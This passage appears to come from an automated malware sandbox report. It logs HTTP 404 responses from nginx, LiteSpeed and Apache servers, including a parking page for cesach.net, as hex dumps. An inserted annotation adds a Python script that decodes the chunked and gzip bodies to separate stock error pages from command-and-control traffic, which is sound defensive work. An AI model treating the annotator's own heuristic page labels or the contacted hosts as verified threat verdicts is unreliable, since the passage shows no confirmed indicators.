72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2024 07:41:21 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "669137aa-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2024 07:41:24 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "669137aa-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2024 07:41:26 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "669137aa-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2024 07:41:29 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "669137aa-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2024 07:41:35 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2024 07:41:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2024 07:41:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2024 07:41:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not 
Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
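Added example, not part of the Joe Sandbox report or of the sample's code: a small decoder for the "Data Raw" field of the HTTP entries above. The report shows the bodies only as a hex dump plus a truncated ASCII rendering, and for the gzip-encoded nginx replies (07:41:35 to 07:41:40) the ASCII column is unreadable. To tell a stock server error page (Apache, LiteSpeed and nginx defaults, a parking page) from something a C2 actually answered with, the analyst has to de-chunk and gunzip the raw bytes first, which is what this script does. The gzip sample is transcribed from the 07:41:35 entry; the plain chunked sample is reconstructed from the decoded text of the 07:41:43 entry; the page labels in `triage()` are this example's own heuristics, not Joe Sandbox's, and everything else is standard library.

```python
import gzip
import re
from typing import Optional

# Transcribed from the 07:41:35 nginx entry in the report: one chunk of size
# 0xa7 (167 bytes) holding a gzip member, then the terminating zero chunk.
GZIP_CHUNKED_HEX = (
    "61 37 0d 0a "
    "1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 "
    "77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 "
    "12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 "
    "0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b "
    "a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 "
    "3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b "
    "a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 "
    "70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 "
    "a7 bf a8 24 02 00 00 "
    "0d 0a 30 0d 0a 0d 0a"
)

# Reconstructed (constructed sample, not a byte-for-byte copy) from the decoded
# text of the 07:41:43 nginx entry: the stock nginx 404 page plus its six
# "padding" comments, sent as a single 0x224-byte (548-byte) chunk.
NGINX_404 = (
    b"<html>\r\n"
    b"<head><title>404 Not Found</title></head>\r\n"
    b"<body>\r\n"
    b"<center><h1>404 Not Found</h1></center>\r\n"
    b"<hr><center>nginx</center>\r\n"
    b"</body>\r\n"
    b"</html>\r\n"
    + b"<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n" * 6
)
PLAIN_CHUNKED = b"224\r\n" + NGINX_404 + b"\r\n0\r\n\r\n"


def parse_data_raw(hex_field: str) -> bytes:
    """Turn the space-separated hex of a 'Data Raw' field into bytes."""
    return bytes.fromhex(hex_field)  # whitespace between byte pairs is ignored


def dechunk(payload: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body (RFC 9112 section 7.1).

    Raises ValueError on a missing CRLF or a non-hex chunk size, which is the
    right outcome for a truncated capture: never silently return a partial body.
    """
    out = bytearray()
    pos = 0
    while True:
        end = payload.index(b"\r\n", pos)
        size_line = payload[pos:end].split(b";", 1)[0].strip()  # drop chunk extensions
        size = int(size_line, 16)
        pos = end + 2
        if size == 0:
            break  # last-chunk; trailer fields, if any, are not needed here
        out += payload[pos:pos + size]
        if payload[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("chunk data not terminated by CRLF")
        pos += size + 2
    return bytes(out)


def decode_body(payload: bytes, chunked: bool, content_encoding: Optional[str]) -> bytes:
    """Apply Transfer-Encoding and Content-Encoding in the order a client would."""
    body = dechunk(payload) if chunked else payload
    if content_encoding == "gzip":
        body = gzip.decompress(body)  # also verifies the CRC32 / ISIZE trailer
    return body


def triage(body: bytes) -> dict:
    """Summarise a decoded body so stock error pages can be separated from
    anything that would deserve a closer look as C2 content. The labels are
    this example's own heuristics, derived from the bodies in the report."""
    text = body.decode("utf-8", errors="replace")
    m = re.search(r"<title>\s*(.*?)\s*</title>", text, re.I | re.S)
    page = None
    if "<center>nginx</center>" in text:
        page = "nginx default 404"
    elif "ErrorDocument" in text:
        page = "Apache default 404"
    elif "The resource requested could not be found on this server!" in text:
        page = "LiteSpeed default 404"
    return {"length": len(body), "title": m.group(1) if m else "", "server_page": page}


if __name__ == "__main__":
    raw = parse_data_raw(GZIP_CHUNKED_HEX)
    print(triage(decode_body(raw, chunked=True, content_encoding="gzip")))
    print(triage(decode_body(PLAIN_CHUNKED, chunked=True, content_encoding=None)))
```

The gzip member's trailer (the last eight bytes, CRC32 then ISIZE) already says the uncompressed body is 0x224 = 548 bytes, the same size as the un-encoded chunk in the 07:41:43 reply, which is why the decoded output is expected to be the familiar nginx page with padding and not anything worth treating as an indicator.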
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 07:42:03 GMTServer: ApacheX-ServerIndex: llim604Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 
29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 07:42:05 GMTServer: ApacheX-ServerIndex: llim605Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 
29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 07:42:08 GMTServer: ApacheX-ServerIndex: llim603Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 
